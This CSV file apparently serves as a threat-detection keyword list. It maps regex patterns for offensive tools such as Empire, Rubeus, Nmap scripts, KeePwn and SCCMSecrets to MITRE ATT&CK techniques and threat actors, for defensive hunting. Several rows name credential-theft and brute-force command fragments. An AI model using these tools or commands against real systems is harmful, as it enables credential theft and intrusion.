Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","422"
"* BofRunner(*",".{0,1000}\sBofRunner\(.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","423"
"* -bootkey *",".{0,1000}\s\-bootkey\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","424"
"* Brc4LdapSentinelParser*",".{0,1000}\sBrc4LdapSentinelParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","427"
"* broadcast-ataoe-discover.nse*",".{0,1000}\sbroadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","428"
"* broadcast-avahi-dos.nse*",".{0,1000}\sbroadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","429"
"* broadcast-bjnp-discover.nse*",".{0,1000}\sbroadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","430"
"* broadcast-db2-discover.nse*",".{0,1000}\sbroadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","431"
"* broadcast-dhcp6-discover.nse*",".{0,1000}\sbroadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","432"
"* broadcast-dhcp-discover.nse*",".{0,1000}\sbroadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","433"
"* broadcast-dns-service-discovery.nse*",".{0,1000}\sbroadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","434"
"* broadcast-dropbox-listener.nse*",".{0,1000}\sbroadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","435"
"* broadcast-eigrp-discovery.nse*",".{0,1000}\sbroadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","436"
"* broadcast-hid-discoveryd.nse*",".{0,1000}\sbroadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","437"
"* broadcast-igmp-discovery.nse*",".{0,1000}\sbroadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","438"
"* broadcast-jenkins-discover.nse*",".{0,1000}\sbroadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","439"
"* broadcast-listener.nse*",".{0,1000}\sbroadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","440"
"* broadcast-ms-sql-discover.nse*",".{0,1000}\sbroadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","441"
"* broadcast-netbios-master-browser.nse*",".{0,1000}\sbroadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","442"
"* broadcast-networker-discover.nse*",".{0,1000}\sbroadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","443"
"* broadcast-novell-locate.nse*",".{0,1000}\sbroadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","444"
"* broadcast-ospf2-discover.nse*",".{0,1000}\sbroadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","445"
"* broadcast-pc-anywhere.nse*",".{0,1000}\sbroadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","446"
"* broadcast-pc-duo.nse*",".{0,1000}\sbroadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","447"
"* broadcast-pim-discovery.nse*",".{0,1000}\sbroadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","448"
"* broadcast-ping.nse*",".{0,1000}\sbroadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","449"
"* broadcast-pppoe-discover.nse*",".{0,1000}\sbroadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","450"
"* broadcast-rip-discover.nse*",".{0,1000}\sbroadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","451"
"* broadcast-ripng-discover.nse*",".{0,1000}\sbroadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","452"
"* broadcast-sonicwall-discover.nse*",".{0,1000}\sbroadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","453"
"* broadcast-sybase-asa-discover.nse*",".{0,1000}\sbroadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","454"
"* broadcast-tellstick-discover.nse*",".{0,1000}\sbroadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","455"
"* broadcast-upnp-info.nse*",".{0,1000}\sbroadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","456"
"* broadcast-versant-locate.nse*",".{0,1000}\sbroadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","457"
"* broadcast-wake-on-lan.nse*",".{0,1000}\sbroadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","458"
"* broadcast-wpad-discover.nse*",".{0,1000}\sbroadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","459"
"* broadcast-wsdd-discover.nse*",".{0,1000}\sbroadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","460"
"* broadcast-xdmcp-discover.nse*",".{0,1000}\sbroadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","461"
"* bropper.py*",".{0,1000}\sbropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","462"
"* BrtoVenomRenames.sh*",".{0,1000}\sBrtoVenomRenames\.sh.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","463"
"* brute * /password*",".{0,1000}\sbrute\s.{0,1000}\s\/password.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","464"
"* --bruteforce *.kdbx*",".{0,1000}\s\-\-bruteforce\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","465"
"* BruteForce(*",".{0,1000}\sBruteForce\(.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","466"
"* --bruteforce-range *",".{0,1000}\s\-\-bruteforce\-range\s.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","0","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","467"
"* Bruteforcing bad characters*",".{0,1000}\sBruteforcing\sbad\scharacters.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","468"
